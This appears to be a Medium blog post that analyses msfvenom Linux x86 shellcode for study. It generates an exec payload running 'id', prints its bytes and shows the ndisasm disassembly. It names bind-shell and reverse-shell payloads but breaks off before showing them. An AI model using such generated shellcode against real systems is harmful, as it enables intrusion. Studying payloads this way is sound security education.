Member-only story
Msfvenom Shellcode Analysis
Today I will analyze the following shellcode generated by the msfvenom, specifically in linux/x86:
- linux/x86/exec — Execute an arbitrary command
- linux/x86/shell_bind_tcp — Listen for a connection and spawn a command shell
- linux/x86/shell_reverse_tcp — Connect back to attacker and spawn a command shell
1) linux/x86/exec
This msfvenom will execute an arbitrary command that you add while creating a payload. Let’s create the payload with the linux command id.
# msfvenom -p linux/x86/exec CMD=id -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 38 bytes
Final size of c file: 185 bytes
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x69"
"\x64\x00\x57\x53\x89\xe1\xcd\x80";Then, we will use ndisasm - the Netwide Disassembler - to disassemble the created shellcode.
# echo -ne "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x69\x64\x00\x57\x53\x89\xe1\xcd\x80" | ndisasm -b 32 -00000000 6A0B push byte +0xb
00000002 58 pop eax
00000003 99 cdq
00000004 52 push edx
00000005 66682D63 push word 0x632d
00000009 89E7 mov edi,esp
0000000B 682F736800 push dword 0x68732f
00000010 682F62696E push dword 0x6e69622f
00000015 89E3 mov ebx,esp
00000017 52 push edx
00000018 E803000000 call 0x20
0000001D 696400575389E1CD imul esp,[eax+eax+0x57],dword 0xcde18953
00000025 80 db 0x80
### echo:
-n : Do not output the trailing newline
-e : Enable interpretation of backslash escapes### ndisasm
-b : Set the processor mode
Let’s analyze the disassembled payload.
